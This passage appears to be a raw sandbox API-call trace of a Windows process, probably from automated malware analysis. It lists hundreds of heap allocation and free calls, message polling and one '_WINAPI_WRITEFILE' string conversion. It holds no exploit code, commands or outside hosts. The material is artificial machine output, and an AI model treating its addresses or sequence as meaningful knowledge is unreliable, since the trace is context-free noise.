0x6bb628 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.735] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.736] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.736] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.736] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.736] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0b20 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.737] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.737] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.737] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.738] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.739] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.740] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.740] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690850 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690780 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908e0 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0075.741] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690910 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76afe8 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.741] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.742] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.742] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.742] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.742] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.743] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.743] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.743] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.743] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.743] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) 